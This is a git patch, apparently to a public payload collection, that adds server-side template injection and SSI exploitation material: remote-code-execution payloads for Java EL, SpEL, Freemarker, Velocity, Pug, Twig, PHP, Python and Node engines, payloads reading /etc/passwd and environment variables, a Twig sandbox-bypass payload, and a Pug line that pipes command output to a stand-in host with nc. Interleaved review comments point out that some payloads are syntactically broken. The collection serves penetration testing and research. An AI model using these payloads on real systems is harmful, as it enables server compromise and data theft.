From 7fb2ff75d7f299246fda0b14f04b28de741bf799 Mon Sep 17 00:00:00 2001
From: vladko312
Date: Sat, 3 Jan 2026 05:20:04 +0300
Subject: [PATCH 1/5] SSI:
- Added SSTImap to the tools, as it now supports SSI detection and exploitation

SSTI:
- Added description for known detection and exploitation techniques
- Added payloads for universal detection
- Added universal payloads for different languages
- Added Error-Based and Boolean-Based payloads
- Moved SpEL payloads using `T()` to the correct category
- Moved Pug payloads to the correct language and updated info to reflect the actual name

---
 Server Side Include Injection/README.md        |  11 ++
 .../Images/technique_Boolean-Based.png         | Bin 0 -> 5386 bytes
 .../Images/technique_Error-Based.png           | Bin 0 -> 6973 bytes
 .../Images/technique_Polyglot-Based.png        | Bin 0 -> 5164 bytes
 .../Images/technique_Rendered.png              | Bin 0 -> 4370 bytes
 .../Images/technique_Time-Based.png            | Bin 0 -> 4744 bytes
 Server Side Template Injection/Java.md         | 124 +++++++++-----
 Server Side Template Injection/JavaScript.md   |  74 +++++++--
 Server Side Template Injection/PHP.md          |  66 ++++++--
 Server Side Template Injection/Python.md       |  44 +++--
 Server Side Template Injection/README.md       | 152 ++++++++++++++++--
 Server Side Template Injection/Ruby.md         |  31 +++-
 12 files changed, 405 insertions(+), 97 deletions(-)
 create mode 100644 Server Side Template Injection/Images/technique_Boolean-Based.png
 create mode 100644 Server Side Template Injection/Images/technique_Error-Based.png
 create mode 100644 Server Side Template Injection/Images/technique_Polyglot-Based.png
 create mode 100644 Server Side Template Injection/Images/technique_Rendered.png
 create mode 100644 Server Side Template Injection/Images/technique_Time-Based.png

diff --git a/Server Side Include Injection/README.md b/Server Side Include Injection/README.md
index 62dcb71a45..5880147ec8 100644
--- a/Server Side Include Injection/README.md
+++ b/Server Side Include Injection/README.md
@@ -4,10 +4,21 @@ ## Summary +* [Tools](#tools) * [Methodology](#methodology) * [Edge Side Inclusion](#edge-side-inclusion) * [References](#references) +## Tools + +- [vladko312/SSTImap](https://github.com/vladko312/SSTImap) - Automatic SSTI detection tool with interactive interface based on [epinna/tplmap](https://github.com/epinna/tplmap), supports SSI detection and exploitation with `--legacy` or `-e SSI` + + ```bash + python3 ./sstimap.py -u 'https://example.com/page?name=John' --legacy -s + python3 ./sstimap.py -i -u 'https://example.com/page?name=Vulnerable*&message=My_message' -l 5 -e SSI + python3 ./sstimap.py -i --legacy -A -m POST -l 5 -H 'Authorization: Basic bG9naW46c2VjcmV0X3Bhc3N3b3Jk' + ``` + ## Methodology SSI Injection occurs when an attacker can input Server Side Include directives into a web application. SSIs are directives that can include files, execute commands, or print environment variables/attributes. If user input is not properly sanitized within an SSI context, this input can be used to manipulate server-side behavior and access sensitive information or execute commands. 
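Review bot: the three SSTImap invocations in the new Tools entry use flags (`-s`, `-i`, `-A`, `-l 5`, `-m POST`) that the entry never explains, so a reader cannot tell what each example line demonstrates beyond `--legacy` / `-e SSI`; a few words per line, or one sentence mapping each flag to its purpose, would make the block self-explanatory. The `Authorization: Basic bG9naW46c2VjcmV0X3Bhc3N3b3Jk` header in the third line should also be marked as a placeholder credential so it is not copied verbatim.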
diff --git a/Server Side Template Injection/Images/technique_Boolean-Based.png b/Server Side Template Injection/Images/technique_Boolean-Based.png
new file mode 100644
index 0000000000000000000000000000000000000000..9081d50c6bb7d43a21ddd6b13a780f89bb677248
GIT binary patch (binary data omitted)
diff --git a/Server Side Template Injection/Images/technique_Polyglot-Based.png b/Server Side Template Injection/Images/technique_Polyglot-Based.png
new file mode 100644
index 0000000000000000000000000000000000000000..5546e3bc12a0227545e58fa98fdf128151668ed6
GIT binary patch (binary data omitted)
 Java has multiple Expression Languages using similar syntax. > Multiple variable expressions can be used, if `${...}` doesn't work try `#{...}`, `*{...}`, `@{...}` or `~{...}`.
@@ -62,18 +64,14 @@ ${class.getResource("").getPath()} ${class.getResource("../../../../../index.htm").getContent()} ``` -### Java - Retrieve Environment Variables - -```java -${T(java.lang.System).getenv()} -``` - -### Java - Retrieve /etc/passwd +### Java EL - Code Execution ```java -${T(java.lang.Runtime).getRuntime().exec('cat /etc/passwd')} +${''.getClass().forName('java.lang.String').getConstructor(''.getClass().forName('[B')).newInstance(''.getClass().forName('java.lang.Runtime').getRuntime().exec('id').inputStream.readAllBytes())} // Rendered RCE +${''.getClass().forName('java.lang.Integer').valueOf('x'+''.getClass().forName('java.lang.String').getConstructor(''.getClass().forName('[B')).newInstance(''.getClass().forName('java.lang.Runtime').getRuntime().exec('id').inputStream.readAllBytes()))} // Error-Based RCE +${1/((''.getClass().forName('java.lang.Runtime').getRuntime().exec('id').waitFor()==0)?1:0)+''} // Boolean-Based RCE +${(''.getClass().forName('java.lang.Runtime').getRuntime().exec('id').waitFor().equals(0)?(''.getClass().forName('java.lang.Thread')).sleep(5000):0).toString()} // Time-Based RCE -${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())} ``` --- 
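Review bot: this hunk deletes the `### Java - Retrieve Environment Variables` and `### Java - Retrieve /etc/passwd` headings, so any Summary links in Java.md pointing at `#java---retrieve-environment-variables` or `#java---retrieve-etcpasswd` now dangle unless the first hunk of Java.md (not legible in this copy of the patch) updates them; please confirm. The new `### Java EL - Code Execution` block also labels its four lines `Rendered`, `Error-Based`, `Boolean-Based` and `Time-Based` without saying what those detection modes mean; one sentence above the fence, or a link to the README section the commit message says introduces them, would keep the file readable on its own.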
@@ -108,6 +106,10 @@ Convert the returned bytes to ASCII ${"freemarker.template.utility.Execute"?new()("id")} #{"freemarker.template.utility.Execute"?new()("id")} [="freemarker.template.utility.Execute"?new()("id")] + +${("xx"+("freemarker.template.utility.Execute"?new()("id")))?new()} // Error-Based RCE +${1/((freemarker.template.utility.Execute"?new()(" … && echo UniqueString")?chop_linebreak?ends_with("UniqueString"))?string('1','0')?eval)} // Boolean-Based RCE +${"freemarker.template.utility.Execute"?new()("id && sleep 5")} // Time-Based RCE ``` ### Freemarker - Sandbox Bypass @@ -124,24 +126,6 @@ ${dwf.newInstance(ec,null)("id")} --- -## Codepen - -[Official website](https://codepen.io/) -> - -```python -- var x = root.process -- x = x.mainModule.require -- x = x('child_process') -= x.exec('id | nc attacker.net 80') -``` - -```javascript -#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout} -``` - ---- - ## Jinjava [Official website](https://github.com/HubSpot/jinjava) @@ -259,6 +243,41 @@ A more flexible and stealthy payload that supports base64-encoded commands, allo #end ``` +Error-Based RCE payload: + +```java +#set($s="") +#set($sc=$s.getClass().getConstructor($s.getClass().forName("[B"), $s.getClass())) +#set($p=$s.getClass().forName("java.lang.Runtime").getRuntime().exec("id") +#set($n=$p.waitFor()) +#set($b="Y:/A:/"+$sc.newInstance($p.inputStream.readAllBytes(), "UTF-8")) +#include($b) +``` + +Boolean-Based RCE payload: + +```java +#set($s="") +#set($p=$s.getClass().forName("java.lang.Runtime").getRuntime().exec("id")) +#set($n=$p.waitFor()) +#set($r=$p.exitValue()) +#if($r != 0) +#include("Y:/A:/xxx") +#end +``` + +Time-Based RCE payload: + +```java +#set($s="") +#set($p=$s.getClass().forName("java.lang.Runtime").getRuntime().exec("id")) +#set($n=$p.waitFor()) +#set($r=$p.exitValue()) +#if($r != 0) +#set($t=$s.getClass().forName("java.lang.Thread").sleep(5000)) +#end +``` + --- ## Groovy 
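Review bot: in the Freemarker hunk, the Boolean-Based line `${1/((freemarker.template.utility.Execute"?new()(" … && echo UniqueString")...` is missing the opening quote before `freemarker.template.utility.Execute` (compare the Rendered line `${"freemarker.template.utility.Execute"?new()("id")}`), so the expression as written does not parse; the ` … ` inside the command string is also an unexplained placeholder and should either be marked as one or use the `id` that every other line in the block uses. In the Velocity hunk, the Error-Based block's line `#set($p=$s.getClass().forName("java.lang.Runtime").getRuntime().exec("id")` lacks its closing parenthesis, which the identical line in the Boolean-Based and Time-Based blocks has.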
@@ -310,6 +329,8 @@ ${ new groovy.lang.GroovyClassLoader().parseClass("@groovy.transform.ASTTest(val ## Spring Expression Language +> Java EL payloads also work for SpEL + [Official website](https://docs.spring.io/spring-framework/docs/3.0.x/reference/expressions.html) > The Spring Expression Language (SpEL for short) is a powerful expression language that supports querying and manipulating an object graph at runtime. The language syntax is similar to Unified EL but offers additional features, most notably method invocation and basic string templating functionality. @@ -321,6 +342,20 @@ ${7*7} ${'patt'.toString().replace('a', 'x')} ``` +### SpEL - Retrieve Environment Variables + +```java +${T(java.lang.System).getenv()} +``` + +### SpEL - Retrieve /etc/passwd + +```java +${T(java.lang.Runtime).getRuntime().exec('cat /etc/passwd')} + +${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())} +``` + ### SpEL - DNS Exfiltration DNS lookup 
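Review bot: the new `> Java EL payloads also work for SpEL` line would be more useful as an in-file anchor link (`[Java EL - Code Execution](#java-el---code-execution)`, the style the Summary already uses) so the reader can find the section it refers to, and as a plain sentence rather than a `>` quote, since in this file the quote directly under `[Official website]` is the project's own description and the two quotes now read as one. The same applies to the `> Universal payloads also work for ...` lines added to PHP.md later in this patch.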
@@ -390,3 +425,4 @@ ${pageContext.request.getSession().setAttribute("admin",true)} - [Leveraging the Spring Expression Language (SpEL) injection vulnerability (a.k.a The Magic SpEL) to get RCE - Xenofon Vassilakopoulos - November 18, 2021](https://xen0vas.github.io/Leveraging-the-SpEL-Injection-Vulnerability-to-get-RCE/) - [RCE in Hubspot with EL injection in HubL - @fyoorer - December 7, 2018](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html) - [Remote Code Execution with EL Injection Vulnerabilities - Asif Durani - January 29, 2019](https://www.exploit-db.com/docs/english/46303-remote-code-execution-with-el-injection-vulnerabilities.pdf) +- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md) diff --git a/Server Side Template Injection/JavaScript.md b/Server Side Template Injection/JavaScript.md index 36ed268054..f317f735bf 100644 --- a/Server Side Template Injection/JavaScript.md +++ b/Server Side Template Injection/JavaScript.md 
@@ -5,31 +5,56 @@ ## Summary - [Templating Libraries](#templating-libraries) +- [Universal Payloads](#universal-payloads) - [Handlebars](#handlebars) - [Handlebars - Basic Injection](#handlebars---basic-injection) - [Handlebars - Command Execution](#handlebars---command-execution) - [Lodash](#lodash) - [Lodash - Basic Injection](#lodash---basic-injection) - [Lodash - Command Execution](#lodash---command-execution) +- [Pug](#pug) - [References](#references) ## Templating Libraries -| Template Name | Payload Format | -| ------------ | --------- | -| DotJS | `{{= }}` | -| DustJS | `{}` | -| EJS | `<% %>` | -| HandlebarsJS | `{{ }}` | -| HoganJS | `{{ }}` | -| Lodash | `{{= }}` | -| MustacheJS | `{{ }}` | -| NunjucksJS | `{{ }}` | -| PugJS | `#{}` | -| TwigJS | `{{ }}` | -| UnderscoreJS | `<% %>` | -| VelocityJS | `#=set($X="")$X` | -| VueJS | `{{ }}` | +| Template Name | Payload Format | +|---------------|------------------| +| DotJS | `{{= }}` | +| DustJS | `{ }` | +| EJS | `<% %>` | +| HandlebarsJS | `{{ }}` | +| HoganJS | `{{ }}` | +| Lodash | `{{= }}` | +| MustacheJS | `{{ }}` | +| NunjucksJS | `{{ }}` | +| PugJS | `#{ }` | +| TwigJS | `{{ }}` | +| UnderscoreJS | `<% %>` | +| VelocityJS | `#=set($X="")$X` | +| VueJS | `{{ }}` | + +## Universal Payloads + +Generic code injection payloads work for many NodeJS-based template engines, such as DotJS, EJS, PugJS, UnderscoreJS and Eta. + +To use these payloads, wrap them in the appropriate tag. + +```javascript +// Rendered RCE +require("child_process").execSync("id") + +// Error-Based RCE +require("Y:/A:/"+require("child_process").execSync("id")) +""["x"][require("child_process").execSync("id")] + +// Boolean-Based RCE +[""][0 + !(require("child_process").spawnSync("id", options={shell:true}).status===0)]["length"] + +// Time-Based RCE +require("child_process").execSync("id && sleep 5") +``` + +NunjucksJS is also capable of executing these payloads using `{{range.constructor(' ... ')()}}`. ## Handlebars 
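Review bot: in the Boolean-Based line, `spawnSync("id", options={shell:true})` is not keyword-argument syntax in JavaScript: it assigns the object to an undeclared global `options` (a ReferenceError under strict mode or in an ES module) and then passes the value, so it should read `spawnSync("id", {shell:true})`. The introduction lists Eta among the engines these payloads apply to, but Eta has no row in the Templating Libraries table just above; add one with its tag format so the table and the sentence agree.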
@@ -120,7 +145,26 @@ ${= _.VERSION} {{x=Object}}{{w=a=new x}}{{w.type="pipe"}}{{w.readable=1}}{{w.writable=1}}{{a.file="/bin/sh"}}{{a.args=["/bin/sh","-c","id;ls"]}}{{a.stdio=[w,w]}}{{process.binding("spawn_sync").spawn(a).output}} ``` +--- + +## Pug + +[Official website](https://pugjs.org/api/getting-started.html) +> + +```javascript +- var x = root.process +- x = x.mainModule.require +- x = x('child_process') += x.exec('id | nc attacker.net 80') +``` + +```javascript +#{root.process.mainModule.require('child_process').spawnSync('cat', ['/etc/passwd']).stdout} +``` + ## References - [Exploiting Less.js to Achieve RCE - Jeremy Buis - July 1, 2021](https://web.archive.org/web/20210706135910/https://www.softwaresecured.com/exploiting-less-js/) - [Handlebars template injection and RCE in a Shopify app - Mahmoud Gamal - April 4, 2019](https://mahmoudsec.blogspot.com/2019/04/handlebars-template-injection-and-rce.html) +- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md) diff --git a/Server Side Template Injection/PHP.md b/Server Side Template Injection/PHP.md index cc3618c315..5762a55710 100644 --- a/Server Side Template Injection/PHP.md +++ b/Server Side Template Injection/PHP.md @@ -5,6 +5,7 @@ ## Summary - [Templating Libraries](#templating-libraries) +- [Universal Payloads](#universal-payloads) - [Smarty](#smarty) - [Twig](#twig) - [Twig - Basic Injection](#twig---basic-injection) 
@@ -22,16 +23,43 @@ ## Templating Libraries | Template Name | Payload Format | -| --------------- | --------- | -| Blade (Laravel) | `{{ }}` | -| Latte | `{var $X=""}{$X}` | -| Mustache | `{{ }}` | -| Plates | `` | -| Smarty | `{ }` | -| Twig | `{{ }}` | +|-----------------|----------------| +| Blade (Laravel) | `{{ }}` | +| Latte | `{ }` | +| Mustache | `{{ }}` | +| Plates | `` | +| Smarty | `{ }` | +| Twig | `{{ }}` | + +## Universal Payloads + +Generic code injection payloads work for many PHP-based template engines, such as Blade, Latte and Smarty. + +To use these payloads, wrap them in the appropriate tag. + +```php +// Rendered RCE +shell_exec('id') +system('id') + +// Error-Based RCE +ini_set("error_reporting", "1") // Enable verbose fatal errors for Error-Based +fopen(join("", ["Y:/A:/", shell_exec('id')]), "r") +include(join("", ["Y:/A:/", shell_exec('id')])) +join("", ["xx", shell_exec('id')])() + +// Boolean-Based RCE +1 / (pclose(popen("id", "wb")) == 0) + +// Time-Based RCE +shell_exec('id && sleep 5') +system('id && sleep 5') +``` ## Blade +> Universal payloads also work for Blade. + [Official website](https://laravel.com/docs/master/blade) > Blade is the simple, yet powerful templating engine that is included with Laravel. @@ -45,6 +73,8 @@ The string `id` is generated with `{{implode(null,array_map(chr(99).chr(104).chr ## Smarty +> Universal payloads also work for Smarty before v5. + [Official website](https://www.smarty.net/docs/en/) > Smarty is a template engine for PHP. @@ -52,8 +82,8 @@ The string `id` is generated with `{{implode(null,array_map(chr(99).chr(104).chr {$smarty.version} {php}echo `id`;{/php} //deprecated in smarty v3 {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"",self::clearConfig())} -{system('ls')} // compatible v3 -{system('cat index.php')} // compatible v3 +{system('ls')} // compatible v3, deprecated in v5 +{system('cat index.php')} // compatible v3, deprecated in v5 ``` --- 
@@ -109,6 +139,19 @@ $output = $twig > render ( {{['id']|filter('passthru')}} {{['id']|map('passthru')}} {{['nslookup oastify.com']|filter('system')}} + +{% for a in ["error_reporting", "1"]|sort("ini_set") %}{% endfor %} // Enable verbose error output for Error-Based +{{_self.env.registerUndefinedFilterCallback("shell_exec")}}{%include ["Y:/A:/", _self.env.getFilter("id")]|join%} // Error-Based RCE <= 1.19 +{{[0]|map(["xx", {"id": "shell_exec"}|map("call_user_func")|join]|join)}} // Error-Based RCE >=1.41, >=2.10, >=3.0 + +{{_self.env.registerUndefinedFilterCallback("shell_exec")}}{{1/(_self.env.getFilter("id && echo UniqueString")|trim('\n') ends with "UniqueString")}} // Boolean-Based RCE <= 1.19 +{{1/({"id && echo UniqueString":"shell_exec"}|map("call_user_func")|join|trim('\n') ends with "UniqueString")}} // Boolean-Based RCE >=1.41, >=2.10, >=3.0 +{{ 1 / (["id >>/dev/null && echo -n 1", "0"]|sort("system")|first == "0") }} // Boolean-Based RCE with sandbox bypass using CVE-2022-23614 +``` + +With certain settings, Twig interrupts rendering, if any errors or warnings are raised. This payload works fine in these cases: +```php +{{ {'id':'shell_exec'}|map('call_user_func')|join }} ``` Example injecting values to avoid using quotes for the filename (specify via OFFSET and LENGTH where the payload FILENAME is) @@ -128,6 +171,8 @@ email="{{app.request.query.filter(0,0,1024,{'options':'system'})}}"@attacker.tld ## Latte +> Universal payloads also work for Latte. + ### Latte - Basic Injection ```php 
@@ -262,5 +307,6 @@ layout template: ## References -- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere- YesWeHack - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation) +- [Limitations are just an illusion – advanced server-side template exploitation with RCE everywhere - YesWeHack - March 24, 2025](https://www.yeswehack.com/learn-bug-bounty/server-side-template-injection-exploitation) - [Server Side Template Injection (SSTI) via Twig escape handler - March 21, 2024](https://github.com/getgrav/grav/security/advisories/GHSA-2m7x-c7px-hp58) +- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md) diff --git a/Server Side Template Injection/Python.md b/Server Side Template Injection/Python.md index 056d605710..a95c9e84bc 100644 --- a/Server Side Template Injection/Python.md +++ b/Server Side Template Injection/Python.md @@ -5,6 +5,7 @@ ## Summary - [Templating Libraries](#templating-libraries) +- [Universal Payloads](#universal-payloads) - [Django](#django) - [Django - Basic Injection](#django---basic-injection) - [Django - Cross-Site Scripting](#django---cross-site-scripting) 
@@ -37,15 +38,28 @@ ## Templating Libraries | Template Name | Payload Format | -| ------------ | --------- | -| Bottle | `{{ }}` | -| Chameleon | `${ }` | -| Cheetah | `${ }` | -| Django | `{{ }}` | -| Jinja2 | `{{ }}` | -| Mako | `${ }` | -| Pystache | `{{ }}` | -| Tornado | `{{ }}` | +|---------------|----------------| +| Bottle | `{{ }}` | +| Chameleon | `${ }` | +| Cheetah | `${ }` | +| Django | `{{ }}` | +| Jinja2 | `{{ }}` | +| Mako | `${ }` | +| Pystache | `{{ }}` | +| Tornado | `{{ }}` | + +## Universal Payloads + +Generic code injection payloads work for many Python-based template engines, such as Bottle, Chameleon, Cheetah, Mako and Tornado. + +To use these payloads, wrap them in the appropriate tag. + +```python +__include__("os").popen("id").read() # Rendered RCE +getattr("", "x" + __include__("os").popen("id").read()) # Error-Based RCE +1 / (__include__("os").popen("id")._proc.wait() == 0) # Boolean-Based RCE +__include__("os").popen("id && sleep 5").read() # Time-Based RCE +``` ## Django @@ -220,6 +234,13 @@ We can use these shorter payloads from [@podalirius_](https://twitter.com/podali {{ namespace.__init__.__globals__.os.popen('id').read() }} ``` +Similar payloads could be used for Error-Based and Boolean-Based exploitation: + +```python +{{ cycler.__init__.__globals__.__builtins__.getattr("", "x" + cycler.__init__.__globals__.os.popen('id').read()) }} # Error-Based +{{ 1 / (cycler.__init__.__globals__.os.popen("id")._proc.wait() == 0) }} # Boolean-Based +``` + With [objectwalker](https://github.com/p0dalirius/objectwalker) we can find a path to the `os` module from `lipsum`. This is the shortest payload known to achieve RCE in a Jinja2 template: ```python @@ -303,6 +324,8 @@ Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by [@Se ## Tornado +> Universal payloads also work for Tornado. + ### Tornado - Basic Injection ```py 
@@ -321,6 +344,8 @@ Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by [@Se ## Mako +> Universal payloads also work for Mako. + [Official website](https://www.makotemplates.org/) > Mako is a template library written in Python. Conceptually, Mako is an embedded Python (i.e. Python Server Page) language, which refines the familiar ideas of componentized layout and inheritance to produce one of the most straightforward and flexible models available, while also maintaining close ties to Python calling and scoping semantics. @@ -407,3 +432,4 @@ PoC : - [Jinja2 template injection filter bypasses - Sebastian Neef - August 28, 2017](https://0day.work/jinja2-template-injection-filter-bypasses/) - [Python context free payloads in Mako templates - podalirius - August 26, 2021](https://podalirius.net/en/articles/python-context-free-payloads-in-mako-templates/) - [The minefield between syntaxes: exploiting syntax confusions in the wild - YesWeHack - October 17, 2025](https://www.yeswehack.com/learn-bug-bounty/syntax-confusion-ambiguous-parsing-exploits) +- [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index f7a79f5e88..0a14036bce 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md 
@@ -1,15 +1,24 @@ # Server Side Template Injection -> Template injection allows an attacker to include template code into an existing (or not) template. A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages +> Template injection allows an attacker to include template code into an existing (or not) template. A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages. ## Summary - [Tools](#tools) - [Methodology](#methodology) - - [Identify the Vulnerable Input Field](#identify-the-vulnerable-input-field) - - [Inject Template Syntax](#inject-template-syntax) - - [Enumerate the Template Engine](#enumerate-the-template-engine) - - [Escalate to Code Execution](#escalate-to-code-execution) + - [Detection and Exploitation Techniques](#detection-and-exploitation-techniques) + - [Rendered](#rendered) + - [Error-Based](#error-based) + - [Boolean-Based](#boolean-based) + - [Time-Based](#time-based) + - [Out of Bounds](#out-of-bounds) + - [Polyglot-Based](#polyglot-based) + - [Universal Detection Payloads](#universal-detection-payloads) + - [Manual Detection and Exploitation](#manual-detection-and-exploitation) + - [Identify the Vulnerable Input Field](#identify-the-vulnerable-input-field) + - [Inject Template Syntax](#inject-template-syntax) + - [Enumerate the Template Engine](#enumerate-the-template-engine) + - [Escalate to Code Execution](#escalate-to-code-execution) - [Labs](#labs) - [References](#references) 
@@ -32,15 +41,133 @@ - [vladko312/SSTImap](https://github.com/vladko312/SSTImap) - Automatic SSTI detection tool with interactive interface based on [epinna/tplmap](https://github.com/epinna/tplmap) - ```powershell + ```bash python3 ./sstimap.py -u 'https://example.com/page?name=John' -s - python3 ./sstimap.py -u 'https://example.com/page?name=Vulnerable*&message=My_message' -l 5 -e jade + python3 ./sstimap.py -i -u 'https://example.com/page?name=Vulnerable*&message=My_message' -l 5 -e jade python3 ./sstimap.py -i -A -m POST -l 5 -H 'Authorization: Basic bG9naW46c2VjcmV0X3Bhc3N3b3Jk' ``` ## Methodology -### Identify the Vulnerable Input Field +### Detection and Exploitation Techniques + +Original research: + +- Rendered, Time-Based: [Server-Side Template Injection: RCE For The Modern Web App - James Kettle - August 05, 2015](https://portswigger.net/knowledgebase/papers/serversidetemplateinjection.pdf) +- Polyglot-Based: [Improving the Detection and Identification of Template Engines for Large-Scale Template Injection Scanning - Maximilian Hildebrand - September 19, 2023](https://www.hackmanit.de/images/download/thesis/Improving-the-Detection-and-Identification-of-Template-Engines-for-Large-Scale-Template-Injection-Scanning-Maximilian-Hildebrand-Master-Thesis-Hackmanit.pdf) +- Error-Based, Boolean-Based: [Successful Errors: New Code Injection and SSTI Techniques - Vladislav Korchagin - January 03, 2026](https://github.com/vladko312/Research_Successful_Errors/blob/main/README.md) + +#### Rendered + +![Rendered technique workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Images/technique_Rendered.png?raw=true) + +> Applicability: detection, exploitation + +When the rendered template is displayed to the attacker, Rendered technique can be used to include the results of the injected code on the page. 
+ +#### Error-Based + +![Error-Based technique workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Images/technique_Error-Based.png?raw=true) + +> Applicability: detection, exploitation + +When the errors are verbosely displayed to the attacker, Error-Based technique can be used to trigger the error message containing the results of the injected code. + +#### Boolean-Based + +![Boolean-Based technique workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Images/technique_Boolean-Based.png?raw=true) + +> Applicability: detection, blind exploitation, blind data exfiltration + +Boolean-Based technique can be used to conditionally trigger an error to indicate success or failure of the injected code. + +#### Time-Based + +![Time-Based technique workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Images/technique_Time-Based.png?raw=true) + +> Applicability: limited detection, blind exploitation, blind data exfiltration + +Time-Based technique can be used to conditionally trigger the delay to indicate success or failure of the injected code. + +Triggering the delay often requires guessing payloads for code evaluation or OS command execution. + +#### Out of Bounds + +> Applicability: limited detection, exploitation + +Out of Bounds technique can be used to expose results of the injected code through other channels (e.g. by connecting to an attacker-controlled server). + +This technique often requires guessing payloads for code evaluation or OS command execution. 
+ +#### Polyglot-Based + +![Polyglot-Based technique workflow](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/Images/technique_Polyglot-Based.png?raw=true) + +> Applicability: detection + +Polyglot-Based technique can be used to quickly determine the template engine by checking how it transforms different payloads. + +### Universal Detection Payloads + +Polyglot to trigger an error in presence of SSTI vulnerability: + +```ps1 +${{<%[%'"}}%\. +``` + +Common tags to test for SSTI with code evaluation: + +``` +{{ ... }} +${ ... } +#{ ... } +<%= ... %> +{ ... } +{{= ... }} +{= ... } +\n= ... \n +*{ ... } +@{ ... } +@( ... ) +``` + +Rendered SSTI can be checked by using mathematical expressions inside the tags: + +``` +7 * 7 +``` + +Error-Based SSTI can be checked by using this payload inside the tags: + +``` +(1/0).zxy.zxy +``` + +If the error caused by that payload is displayed verbosely, it can be checked to guess the language used for code evaluation: + +| Error | Language | +|-------------------------------|-------------------| +| ZeroDivisionError | Python | +| java.lang.ArithmeticException | Java | +| ReferenceError | NodeJS | +| TypeError | NodeJS | +| Division by zero | PHP | +| DivisionByZeroError | PHP | +| divided by 0 | Ruby | +| Arithmetic operation failed | Freemarker (Java) | + +To test for blind injections using Boolean-Based technique, the attacker can test pairs of similar payloads wrapped in tags, where one payload evaluates mathematical expression, while the other triggers syntax error: + +| test | ok | error | +|------|-----------------|-----------------| +| 1 | `(3*4/2)` | `3*)2(/4` | +| 2 | `((7*8)/(2*4))` | `7)(*)8)(2/(*4` | + +Using at least two pairs of payloads avoids false positives caused by external interference. 
+ +### Manual Detection and Exploitation + +#### Identify the Vulnerable Input Field The attacker first locates an input field, URL parameter, or any user-controllable part of the application that is passed into a server-side template without proper sanitization or escaping. @@ -48,7 +175,7 @@ For example, the attacker might identify a web form, search bar, or template pre **TIP**: Generated PDF files, invoices and emails usually use a template. -### Inject Template Syntax +#### Inject Template Syntax The attacker tests the identified input field by injecting template syntax specific to the template engine in use. Different web frameworks use different template engines (e.g., Jinja2 for Python, Twig for PHP, or FreeMarker for Java). @@ -69,7 +196,7 @@ ${{<%[%'"}}%\. The [Hackmanit/Template Injection Table](https://github.com/Hackmanit/template-injection-table) is an interactive table containing the most efficient template injection polyglots along with the expected responses of the 44 most important template engines. -### Enumerate the Template Engine +#### Enumerate the Template Engine Based on the successful response, the attacker determines which template engine is being used. This step is critical because different template engines have different syntax, features, and potential for exploitation. The attacker may try different payloads to see which one executes, thereby identifying the engine. 
@@ -79,7 +206,7 @@ Based on the successful response, the attacker determines which template engine [The post "template-engines-injection-101" from @0xAwali](https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756) summarize the syntax and detection method for most of the template engines for JavaScript, Python, Ruby, Java and PHP and how to differentiate between engines that use the same syntax. -### Escalate to Code Execution +#### Escalate to Code Execution Once the template engine is identified, the attacker injects more complex expressions, aiming to execute server-side commands or arbitrary code. @@ -91,6 +218,9 @@ Once the template engine is identified, the attacker injects more complex expres ## References +- [Server-Side Template Injection: RCE For The Modern Web App - James Kettle - August 05, 2015](https://portswigger.net/knowledgebase/papers/serversidetemplateinjection.pdf) +- [Improving the Detection and Identification of Template Engines for Large-Scale Template Injection Scanning - Maximilian Hildebrand - September 19, 2023](https://www.hackmanit.de/images/download/thesis/Improving-the-Detection-and-Identification-of-Template-Engines-for-Large-Scale-Template-Injection-Scanning-Maximilian-Hildebrand-Master-Thesis-Hackmanit.pdf) +- [Successful Errors: 